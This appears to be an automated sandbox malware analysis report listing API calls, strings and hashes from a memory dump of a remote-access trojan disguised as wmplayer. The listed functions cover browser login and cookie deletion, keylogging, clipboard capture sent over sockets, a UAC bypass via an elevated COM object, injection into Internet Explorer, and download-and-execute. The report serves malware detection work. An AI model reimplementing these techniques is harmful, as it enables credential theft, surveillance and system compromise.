                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                            • API String ID: 1164774033-3681987949
                                                                                            • Opcode ID: aa69fda0ab2c2968648b4e27453ac71b0abe9f6a646c55c959d25f27faa08e90
                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                            • Opcode Fuzzy Hash: aa69fda0ab2c2968648b4e27453ac71b0abe9f6a646c55c959d25f27faa08e90
                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                            • API String ID: 3527384056-432212279
                                                                                            APIs
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                            • API String ID: 726551946-3025026198
                                                                                            APIs
                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                            • String ID:
                                                                                            • API String ID: 3520204547-0
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                            • API String ID: 0-3177665633
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                            • ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                            • String ID: 8[G
                                                                                            • API String ID: 1888522110-1691237782
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Object_wcslen
                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                            • API String ID: 240030777-3166923314
                                                                                            APIs
                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                            • GetLastError.KERNEL32 ref: 00419935
                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                            • String ID:
                                                                                            • API String ID: 3587775597-0
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                            • String ID: <D$<D$<D
                                                                                            • API String ID: 745075371-3495170934
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                            • String ID:
                                                                                            • API String ID: 2341273852-0
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            Strings
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                            • String ID: @CG$XCG$`HG$`HG$>G
                                                                                            • API String ID: 341183262-3780268858
                                                                                            APIs
                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                            • API String ID: 2127411465-314212984
                                                                                            • Opcode ID: 6769e8cc64d9111f16b8eee669ba727fa60eebc73dca31ca9d59c0e38e5964c8
                                                                                            • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                            • Opcode Fuzzy Hash: 6769e8cc64d9111f16b8eee669ba727fa60eebc73dca31ca9d59c0e38e5964c8
                                                                                            • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                            Strings
                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                            • UserProfile, xrefs: 0040B227
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                            • API String ID: 2018770650-1062637481
                                                                                            • Opcode ID: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                            • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                            • Opcode Fuzzy Hash: 4bf0afd112dcaa7b01b7bef1570a104e6056d77a39d62cd62e866e491b3392bc
                                                                                            • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                            • String ID: SeShutdownPrivilege
                                                                                            • API String ID: 3534403312-3733053543
                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                            • String ID:
                                                                                            • API String ID: 4043647387-0
                                                                                            • Opcode ID: 2b5c3e16c52d8ae42d7e33b302a4e7d818ac0825cd30324b09a5a6da171318b9
                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                            • Opcode Fuzzy Hash: 2b5c3e16c52d8ae42d7e33b302a4e7d818ac0825cd30324b09a5a6da171318b9
                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                            • String ID:
                                                                                            • API String ID: 276877138-0
                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                            APIs
                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                            • API String ID: 1589313981-1420736420
                                                                                            • Opcode ID: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                            • Opcode Fuzzy Hash: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID: SETTINGS
                                                                                            • API String ID: 3473537107-594951305
                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 1157919129-0
                                                                                            • Opcode ID: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                            • Opcode Fuzzy Hash: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                            APIs
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 1286116820-0
                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                            Strings
                                                                                            Memory Dump Source
